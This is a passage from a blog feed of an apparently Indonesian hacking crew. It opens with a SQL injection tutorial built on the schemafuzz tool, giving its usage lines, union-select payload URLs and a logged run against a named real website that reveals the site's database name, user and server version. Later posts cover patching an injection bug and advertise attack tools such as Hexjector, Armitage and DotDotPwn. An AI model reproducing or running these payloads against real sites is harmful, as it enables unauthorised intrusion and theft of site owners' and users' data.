     MySQL v4+&lt;br /&gt;    Define: --info    Gets MySQL server configuration only.                  MySQL v4+&lt;br /&gt;    Define: --dbs     Shows all databases user has access too.               MySQL v5+&lt;br /&gt;    Define: --schema  Enumerate Information_schema Database.                 MySQL v5+&lt;br /&gt;    Define: --full    Enumerates all databases information_schema table      MySQL v5+&lt;br /&gt;    Define: --dump    Extract information from a Database, Table and Column. MySQL v4+&lt;br /&gt;    Define: --fuzz    Fuzz Tables and Columns.                               MySQL v4+&lt;br /&gt;&lt;br /&gt;    Required:&lt;br /&gt;    Define: -u        URL "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4"&lt;br /&gt;&lt;br /&gt;    Mode dump and schema options:&lt;br /&gt;    Define: -D        "database_name"&lt;br /&gt;    Define: -T        "table_name"&lt;br /&gt;    Define: -C        "column_name,column_name..."&lt;br /&gt;&lt;br /&gt;    Optional:&lt;br /&gt;    Define: -p        "127.0.0.1:80 or proxy.txt"&lt;br /&gt;    Define: -o        "ouput_file_name.txt"        Default is schemafuzzlog.txt&lt;br /&gt;    Define: -r        row number to start at&lt;br /&gt;    Define: -v        Verbosity off option. Will not display row #'s in dump mode.&lt;br /&gt;&lt;br /&gt;1. python f --findcol -u "www.site.com/news.php?id=22"&lt;br /&gt;2. python f --info -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4"&lt;br /&gt;3. python f --dbs -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4"&lt;br /&gt;4. python f --schema -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4" -D c_db&lt;br /&gt;5. python f --dump -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4" -D c_db -T user -C name,pass&lt;br /&gt;6. python f --fuzz -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4" -end "/*" -o sitelog.txt&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;[x] Penetrasi ke target. oke, kita cari target........&lt;br /&gt;target di dapat : http://akperpasuruan.com/index.php?list=berita&amp;amp;de=14&lt;br /&gt;&lt;br /&gt;1. langkah pertama --findcol [mencari panjang kolom]&lt;br /&gt;&lt;br /&gt;[root@su110 tmp]# python f --findcol -u "http://akperpasuruan.com/index.php?list=berita&amp;amp;de=14"&lt;br /&gt;&lt;br /&gt;|---------------------------------------------------------------|&lt;br /&gt;| arianom[@]gmail[dot]com                                v5.0                                                |&lt;br /&gt;|   6/2008      schemafuzz.py                                                                                              |&lt;br /&gt;|      -MySQL v5+ Information_schema Database Enumeration            |&lt;br /&gt;|      -MySQL v4+ Data Extractor                                                                               |&lt;br /&gt;|      -MySQL v4+ Table &amp;amp; Column Fuzzer                                                           |&lt;br /&gt;| Usage: python f [options]                                                                                           |&lt;br /&gt;|                      -h help                       kill-9.tk                                                                       |&lt;br /&gt;|---------------------------------------------------------------|&lt;br /&gt;&lt;br /&gt;[+] URL: http://akperpasuruan.com/index.php?list=berita&amp;amp;de=14--&lt;br /&gt;[+] Evasion Used: "+" "--"&lt;br /&gt;[+] 16:55:12&lt;br /&gt;[-] Proxy Not Given&lt;br /&gt;[+] Attempting To find the number of columns...&lt;br /&gt;[+] Testing: 0,1,2,3,&lt;br /&gt;[+] Column Length is: 4&lt;br /&gt;[+] Found null column at column #: 1&lt;br /&gt;[+] SQLi URL: http://akperpasuruan.com/index.php?list=berita&amp;amp;de=14+AND+1=2+UNION+SELECT+0,1,2,3--&lt;br /&gt;[+] darkc0de URL: http://akperpasuruan.com/index.php?list=berita&amp;amp;de=14+AND+1=2+UNION+SELECT+0,darkc0de,2,3&lt;br /&gt;[-] Done!&lt;br /&gt;&lt;br /&gt;2. langkah ke dua --info [melihat database]&lt;br /&gt;&lt;br /&gt;[root@su110 tmp]# python f --info -u "http://akperpasuruan.com/index.php?list=berita&amp;amp;de=14+AND+1=2+UNION+SELECT+0,darkc0de,2,3"&lt;br /&gt;&lt;br /&gt;|---------------------------------------------------------------|&lt;br /&gt;| arianom[@]gmail[dot]com                                v5.0                                                |&lt;br /&gt;|   6/2008      schemafuzz.py                                                                                              |&lt;br /&gt;|      -MySQL v5+ Information_schema Database Enumeration            |&lt;br /&gt;|      -MySQL v4+ Data Extractor                                                                               |&lt;br /&gt;|      -MySQL v4+ Table &amp;amp; Column Fuzzer                                                           |&lt;br /&gt;| Usage: python f [options]                                                                                           |&lt;br /&gt;|                       -h help                        kill-9.tk                                                                        |&lt;br /&gt;|---------------------------------------------------------------|&lt;br /&gt;&lt;br /&gt;[+] URL: http://akperpasuruan.com/index.php?list=berita&amp;amp;de=14+AND+1=2+UNION+SELECT+0,darkc0de,2,3--&lt;br /&gt;[+] Evasion Used: "+" "--"&lt;br /&gt;[+] 16:56:57&lt;br /&gt;[-] Proxy Not Given&lt;br /&gt;[+] Gathering MySQL Server Configuration...&lt;br /&gt;    Database: akperpas_db&lt;br /&gt;    User: akperpas_bagus@localhost&lt;br /&gt;    Version: 5.0.91-community&lt;br /&gt;&lt;br /&gt;[+] Do we have Access to MySQL Database: No&lt;br /&gt;[+] Do we have Access to Load_File: No&lt;br /&gt;&lt;br /&gt;[-] 16:57:23&lt;br /&gt;[-] Total URL Requests 3&lt;br /&gt;[-] Done&lt;br /&gt;&lt;br /&gt;Selengkapnya bisa di download &lt;a href="http://akperpasuruan.com/robots.txt"&gt;&lt;span style="font-weight: bold;"&gt;disini&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;Request mas &lt;a style="font-weight: bold;" href="mailto:bagoes.bocah@ymail.com" target="_blank"&gt;&lt;span class="pn_std"&gt;jhony&lt;/span&gt;&lt;/a&gt; utk tutorial schemafuzz&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;[x] Greats:&lt;br /&gt;All KiLL-9 CrEw and IndonesianCoder Team, DarkCode, MC-CrEW , Magelang-Cyber CrEw, KPLI Kediri, JatimCom, and All Indonesian Hacker and You&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5679666230684006712-3898692497805289442?l=kill-nines.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/9HpK4Ylut5ghkVW226bsd-1La8w/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/9HpK4Ylut5ghkVW226bsd-1La8w/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/9HpK4Ylut5ghkVW226bsd-1La8w/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/9HpK4Ylut5ghkVW226bsd-1La8w/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Kill-9Crew/~4/biihtykXMHs" height="1" width="1"/&gt;</content><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/5679666230684006712/posts/default/3898692497805289442?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/5679666230684006712/posts/default/3898692497805289442?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Kill-9Crew/~3/biihtykXMHs/sql-injection-with-schemafuzz.html" title="SQL Injection With Schemafuzz" /><author><name>arianom</name><uri>http://www.blogger.com/profile/00390503237917172808</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="32" src="http://3.bp.blogspot.com/_t3RQMzRGaJs/TKHjkJdX9PI/AAAAAAAAADM/YdeC9Rh7QjM/S220/k.jpg" /></author><feedburner:origLink>http://kill-nines.blogspot.com/2011/01/sql-injection-with-schemafuzz.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CEMDSH04eip7ImA9Wx9XE0o.&quot;"><id>tag:blogger.com,1999:blog-5679666230684006712.post-6709116762686265847</id><published>2011-01-07T10:37:00.006+07:00</published><updated>2011-01-07T10:54:39.332+07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-01-07T10:54:39.332+07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="tutorial" /><category scheme="http://www.blogger.com/atom/ns#" term="SQLi" /><title>Patch SQL Injection</title><content type="html">SQL Injection adalah salah satu teknik penyerangan ke sebuah web dengan cara memasukkan perintah sql ke url target sehingga attacker bisa memperoleh informasi penting dari website tersebut. Seperti nama user, password, email, dan masih banyak lagi informasi yg bisa didapatkan tergantung kreativitas attacker. Langsung saja kita coba scan bug dengan memasukkan sigle quote di akhir url, misalkan :  &lt;p class="MsoNormal" style=""&gt;&lt;a href="http://site.com/index.php?list=berita&amp;amp;de=14"&gt;http://site.com/index.php?list=berita&amp;amp;de=14&lt;/a&gt;’&lt;/p&gt;&lt;p class="MsoNormal" style=""&gt;Kalau ada error, bisa dianggap positif vuln terhadap sqli. Lihat gambar dibawah:&lt;/p&gt;&lt;p class="MsoNormal" style=""&gt;&lt;a href="http://1.bp.blogspot.com/_t3RQMzRGaJs/TSaNg4pZfNI/AAAAAAAAAFQ/wXx92VKnhxg/s1600/sql1.jpg"&gt;&lt;img style="display: block; margin: 0px auto 10px; text-align: center; cursor: pointer; width: 320px; height: 229px;" src="http://1.bp.blogspot.com/_t3RQMzRGaJs/TSaNg4pZfNI/AAAAAAAAAFQ/wXx92VKnhxg/s320/sql1.jpg" alt="" id="BLOGGER_PHOTO_ID_5559286386136808658" border="0" /&gt;&lt;/a&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Seperti yang kita ketahui bugnya ada di &lt;a href="http://site.com/index.php?list=berita&amp;amp;de=14"&gt;http://site.com/index.php?list=berita&amp;amp;de=14&lt;/a&gt; , lebih tepatnya yg menyebabkan ini semua terjadi adalah file &lt;strong&gt;&lt;i&gt;berita.php&lt;/i&gt;&lt;/strong&gt; dan string &lt;strong&gt;&lt;i&gt;de&lt;/i&gt;&lt;/strong&gt;, sekarang kita coba buka file ini dengan text editor, bisa notepad, wordpad, atau kalau ane sih sukanya pake editplus. Ini isi dari sebagian filenya :&lt;/p&gt;&lt;p class="MsoNormal"&gt;&lt;a href="http://2.bp.blogspot.com/_t3RQMzRGaJs/TSaMkaUAJjI/AAAAAAAAAE4/laupxoAyag0/s1600/sql3.jpg"&gt;&lt;img style="display: block; margin: 0px auto 10px; text-align: center; cursor: pointer; width: 320px; height: 240px;" src="http://2.bp.blogspot.com/_t3RQMzRGaJs/TSaMkaUAJjI/AAAAAAAAAE4/laupxoAyag0/s320/sql3.jpg" alt="" id="BLOGGER_PHOTO_ID_5559285347201852978" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Bugnya ada di script bagian ini :&lt;/p&gt;&lt;span style="color: rgb(51, 51, 255);" &gt;$iddetail      = $_GET['de'];&lt;/span&gt;&lt;p class="MsoNormal" style=""&gt;Tidak adanya filter di &lt;strong&gt;$_GET[‘de’] &lt;/strong&gt;menyebabkan web ini vulnerable. Oke script penyebab ini semua telah kita temukan, sekarang saatnya patching. Tambahkan script ini diatas script vulnerable diatas :&lt;/p&gt;&lt;p class="MsoNormal" style=""&gt;&lt;a href="http://4.bp.blogspot.com/_t3RQMzRGaJs/TSaM77WEZXI/AAAAAAAAAFA/OxnnevTMSqc/s1600/sql4.jpg"&gt;&lt;img style="display: block; margin: 0px auto 10px; text-align: center; cursor: pointer; width: 320px; height: 220px;" src="http://4.bp.blogspot.com/_t3RQMzRGaJs/TSaM77WEZXI/AAAAAAAAAFA/OxnnevTMSqc/s320/sql4.jpg" alt="" id="BLOGGER_PHOTO_ID_5559285751205881202" border="0" /&gt;&lt;/a&gt;&lt;/p&gt;&lt;p class="MsoNormal" style=""&gt;Lalu ganti script &lt;b&gt;&lt;span style="color:blue;"&gt;$iddetail = $_GET['de']&lt;/span&gt;&lt;/b&gt;&lt;span style="color:blue;"&gt;;&lt;/span&gt;&lt;strong&gt; &lt;/strong&gt;menjadi &lt;strong&gt;&lt;span style="color:blue;"&gt;$iddetail = $de&lt;/span&gt;; &lt;/strong&gt;Untuk script lengkapnya bias di download &lt;a href="http://depnakertrans.go.id/uploads/doc/patch-sql.txt"&gt;disini&lt;/a&gt;. &lt;span style="color:black;"&gt;Sekarang coba buka lagi page vulnerable dan tambahkan single quote(‘) dan tarra.. proses patching telah berhasil.&lt;/span&gt;&lt;/p&gt;&lt;a href="http://4.bp.blogspot.com/_t3RQMzRGaJs/TSaNT5kU8BI/AAAAAAAAAFI/LiCmbg7-qSY/s1600/sql2.jpg"&gt;&lt;img style="display: block; margin: 0px auto 10px; text-align: center; cursor: pointer; width: 320px; height: 194px;" src="http://4.bp.blogspot.com/_t3RQMzRGaJs/TSaNT5kU8BI/AAAAAAAAAFI/LiCmbg7-qSY/s320/sql2.jpg" alt="" id="BLOGGER_PHOTO_ID_5559286163045675026" border="0" /&gt;&lt;/a&gt;&lt;p class="MsoNormal" style=""&gt;&lt;span style="color:black;"&gt; &lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style=""&gt;&lt;span style="color:black;"&gt;Greats :&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="MsoNormal" style=""&gt;&lt;span style="color:black;"&gt;All Kill-9 Crew and IndonesianCoder Team, Malang-Cyber Crew and All Indonesian Hacker and You&lt;/span&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5679666230684006712-6709116762686265847?l=kill-nines.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/ByCZxyqopgRAf0KKe0GHUVoeqtM/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/ByCZxyqopgRAf0KKe0GHUVoeqtM/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/ByCZxyqopgRAf0KKe0GHUVoeqtM/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/ByCZxyqopgRAf0KKe0GHUVoeqtM/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Kill-9Crew/~4/QWyeCkoMTSw" height="1" width="1"/&gt;</content><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/5679666230684006712/posts/default/6709116762686265847?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/5679666230684006712/posts/default/6709116762686265847?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Kill-9Crew/~3/QWyeCkoMTSw/patch-sql-injection.html" title="Patch SQL Injection" /><author><name>arianom</name><uri>http://www.blogger.com/profile/00390503237917172808</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="32" src="http://3.bp.blogspot.com/_t3RQMzRGaJs/TKHjkJdX9PI/AAAAAAAAADM/YdeC9Rh7QjM/S220/k.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/_t3RQMzRGaJs/TSaNg4pZfNI/AAAAAAAAAFQ/wXx92VKnhxg/s72-c/sql1.jpg" height="72" width="72" /><feedburner:origLink>http://kill-nines.blogspot.com/2011/01/patch-sql-injection.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DkQNRns7fyp7ImA9Wx9XEEo.&quot;"><id>tag:blogger.com,1999:blog-5679666230684006712.post-8815895774275727172</id><published>2011-01-04T00:03:00.001+07:00</published><updated>2011-01-04T00:06:37.507+07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-01-04T00:06:37.507+07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Hacking Tools" /><title>Hexjector</title><content type="html">&lt;div class="post-header"&gt;  &lt;/div&gt;  &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_p3XIipv981Y/TNbVyXE3vsI/AAAAAAAAAyU/_larYN6LQs4/s1600/screenshot.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img style="width: 200px; height: 126px;" src="http://2.bp.blogspot.com/_p3XIipv981Y/TNbVyXE3vsI/AAAAAAAAAyU/_larYN6LQs4/s200/screenshot.jpg" border="0" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Hexjector is an Opensource,Cross Platform PHP script to automate Site Pentest for SQL Injection Vulnerabilties.&lt;/div&gt;Features:&lt;br /&gt;1.Check for SQL Injection Vulnerablities.&lt;br /&gt;2.Pentest SQL Injection Vulnerablities.&lt;br /&gt;3.Web Application Firewall Detector.&lt;br /&gt;4.Scan For Admin Page&lt;br /&gt;&lt;br /&gt;5.Manual Dump Function&lt;br /&gt;6.Browser&lt;br /&gt;7.SQL Injection Type Detection&lt;br /&gt;8.Search For Vulnerable Sites by using Google Dork&lt;br /&gt;9.MD5 Cracker&lt;br /&gt;&lt;br /&gt;&lt;a href="http://91ce5b97.linkbucks.com/"&gt;Download&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5679666230684006712-8815895774275727172?l=kill-nines.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/xp0YOslhAWAvr2Ziz7nwBhMld0Q/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/xp0YOslhAWAvr2Ziz7nwBhMld0Q/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/xp0YOslhAWAvr2Ziz7nwBhMld0Q/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/xp0YOslhAWAvr2Ziz7nwBhMld0Q/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Kill-9Crew/~4/VjCqlYwbuaU" height="1" width="1"/&gt;</content><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/5679666230684006712/posts/default/8815895774275727172?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/5679666230684006712/posts/default/8815895774275727172?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Kill-9Crew/~3/VjCqlYwbuaU/hexjector.html" title="Hexjector" /><author><name>arianom</name><uri>http://www.blogger.com/profile/00390503237917172808</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="32" src="http://3.bp.blogspot.com/_t3RQMzRGaJs/TKHjkJdX9PI/AAAAAAAAADM/YdeC9Rh7QjM/S220/k.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/_p3XIipv981Y/TNbVyXE3vsI/AAAAAAAAAyU/_larYN6LQs4/s72-c/screenshot.jpg" height="72" width="72" /><feedburner:origLink>http://kill-nines.blogspot.com/2011/01/hexjector.html</feedburner:origLink></entry><entry gd:etag="W/&quot;D0cMR3g6eSp7ImA9Wx9XEEo.&quot;"><id>tag:blogger.com,1999:blog-5679666230684006712.post-1400716520868395116</id><published>2011-01-04T00:02:00.000+07:00</published><updated>2011-01-04T00:18:06.611+07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-01-04T00:18:06.611+07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Hacking Tools" /><title>Armitage</title><content type="html">&lt;div class="post-header"&gt;  &lt;/div&gt;  &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_p3XIipv981Y/TPbYYfGjZzI/AAAAAAAAAz0/qBmc8oBJmRg/s1600/armitage4-1024x798.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img src="http://2.bp.blogspot.com/_p3XIipv981Y/TPbYYfGjZzI/AAAAAAAAAz0/qBmc8oBJmRg/s200/armitage4-1024x798.png" border="0" width="200" height="155" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Armitage  is a graphical cyber attack management tool for Metasploit that  visualizes your targets, recommends exploits, and exposes the advanced  capabilities of the framework. Armitage aims to make Metasploit usable  for security practitioners who understand hacking but don’t use  Metasploit every day. If you want to learn Metasploit and grow into the  advanced features, Armitage can help you.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Armitage organizes Metasploit’s  capabilities around the hacking process. There are features for  discovery, access, post-exploitation, and maneuver.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;For discovery, Armitage exposes  several of Metasploit’s host management features. You can import hosts  and launch scans to populate a database of targets. Armitage also  visualizes the database of targets–you’ll always know which hosts you’re  working with and where you have sessions.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Armitage assists with remote  exploitation–providing features to automatically recommend exploits and  even run active checks so you know which exploits will work. If these  options fail, you can use the Hail Mary approach and unleash db_autopwn  against your target database.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;Requirements&lt;br /&gt;To use Armitage, you need the following:&lt;br /&gt;Linux or Windows&lt;br /&gt;Java 1.6+&lt;br /&gt;Metasploit Framework 3.5+&lt;br /&gt;A configured database. Make sure you know the username, password, and host.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://0eb29074.linkbucks.com/"&gt;Download [Win]&lt;/a&gt;&lt;br /&gt;&lt;a href="http://63fcdbc9.linkbucks.com/"&gt;Download [LiN/niX]&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://f53603f2.linkbucks.com/"&gt;Source&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5679666230684006712-1400716520868395116?l=kill-nines.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/KfxrDy7ifhzH40n2c6RtRfPHJQQ/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/KfxrDy7ifhzH40n2c6RtRfPHJQQ/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/KfxrDy7ifhzH40n2c6RtRfPHJQQ/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/KfxrDy7ifhzH40n2c6RtRfPHJQQ/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Kill-9Crew/~4/XWL_WQYHvHw" height="1" width="1"/&gt;</content><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/5679666230684006712/posts/default/1400716520868395116?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/5679666230684006712/posts/default/1400716520868395116?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Kill-9Crew/~3/XWL_WQYHvHw/armitage.html" title="Armitage" /><author><name>arianom</name><uri>http://www.blogger.com/profile/00390503237917172808</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="32" src="http://3.bp.blogspot.com/_t3RQMzRGaJs/TKHjkJdX9PI/AAAAAAAAADM/YdeC9Rh7QjM/S220/k.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/_p3XIipv981Y/TPbYYfGjZzI/AAAAAAAAAz0/qBmc8oBJmRg/s72-c/armitage4-1024x798.png" height="72" width="72" /><feedburner:origLink>http://kill-nines.blogspot.com/2011/01/armitage.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DkYCQnozfip7ImA9Wx9XEEo.&quot;"><id>tag:blogger.com,1999:blog-5679666230684006712.post-7952156448566398802</id><published>2011-01-04T00:00:00.000+07:00</published><updated>2011-01-04T00:02:43.486+07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-01-04T00:02:43.486+07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Hacking Tools" /><title>DotDotPwn</title><content type="html">&lt;div class="post-header"&gt;  &lt;/div&gt;  &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_p3XIipv981Y/TNccEs1YoLI/AAAAAAAAAyo/IvWYtUx3tAk/s1600/ddpwnasciiart.PNG" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img style="width: 199px; height: 119px;" src="http://1.bp.blogspot.com/_p3XIipv981Y/TNccEs1YoLI/AAAAAAAAAyo/IvWYtUx3tAk/s200/ddpwnasciiart.PNG" border="0" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-top: 0px; text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: Times,'Times New Roman',serif;"&gt;    It's a very flexible intelligent fuzzer to discover traversal directory  vulnerabilities in software such as Web/FTP/TFTP servers, Web platforms  such as CMSs, ERPs, Blogs, etc. Also, it has a protocol-independent  module to send the desired payload to the host and port specified. On  the other hand, it also could be used in a scripting way using the  STDOUT module.&lt;br /&gt;It's written in perl programming language and can be run  either under *NIX or Windows platforms. Fuzzing modules supported in  this version:&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="margin-bottom: 0px; margin-top: 0px;" align="justify"&gt;&lt;span class="Apple-style-span" style="font-family: Times,'Times New Roman',serif;"&gt;                                                     &lt;a href="http://1f940c3f.linkbucks.com"&gt;Download&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5679666230684006712-7952156448566398802?l=kill-nines.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/EfLqbvzPWqOzHdgB9yAK_2vyZPw/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/EfLqbvzPWqOzHdgB9yAK_2vyZPw/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/EfLqbvzPWqOzHdgB9yAK_2vyZPw/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/EfLqbvzPWqOzHdgB9yAK_2vyZPw/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Kill-9Crew/~4/JlkS0af6-vo" height="1" width="1"/&gt;</content><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/5679666230684006712/posts/default/7952156448566398802?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/5679666230684006712/posts/default/7952156448566398802?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Kill-9Crew/~3/JlkS0af6-vo/dotdotpwn.html" title="DotDotPwn" /><author><name>arianom</name><uri>http://www.blogger.com/profile/00390503237917172808</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="32" src="http://3.bp.blogspot.com/_t3RQMzRGaJs/TKHjkJdX9PI/AAAAAAAAADM/YdeC9Rh7QjM/S220/k.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/_p3XIipv981Y/TNccEs1YoLI/AAAAAAAAAyo/IvWYtUx3tAk/s72-c/ddpwnasciiart.PNG" height="72" width="72" /><feedburner:origLink>http://kill-nines.blogspot.com/2011/01/dotdotpwn.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CUMHQH8_eSp7ImA9Wx9XEEs.&quot;"><id>tag:blogger.com,1999:blog-5679666230684006712.post-8325744527096200902</id><published>2011-01-03T20:12:00.001+07:00</published><updated>2011-01-03T21:03:51.141+07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-01-03T21:03:51.141+07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Hacking Tools" /><category scheme="http://www.blogger.com/atom/ns#" term="Kill-9 News" /><title>Blackbuntu</title><content type="html">&lt;div class="post-header"&gt;  &lt;/div&gt;  &lt;div style="text-align: justify;"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_p3XIipv981Y/TRoJnmu5wzI/AAAAAAAAA1Q/TzZuR8iRjrg/s1600/grub_2.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img src="http://3.bp.blogspot.com/_p3XIipv981Y/TRoJnmu5wzI/AAAAAAAAA1Q/TzZuR8iRjrg/s200/grub_2.png" border="0" width="200" height="150" /&gt;&lt;/a&gt;&lt;/div&gt;Blackbuntu  is distribution for penetration testing which was specially designed  for security training students and practitioners of information  security.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Blackbuntu is penetration  testing distribution with GNOME Desktop Environment. It's currently  being built using the Ubuntu 10.10 and work on reference Back|Track.  It's created as a hobby. &lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;a href="http://a95420d1.linkbucks.com"&gt;Source&lt;/a&gt;&lt;/div&gt;&lt;div 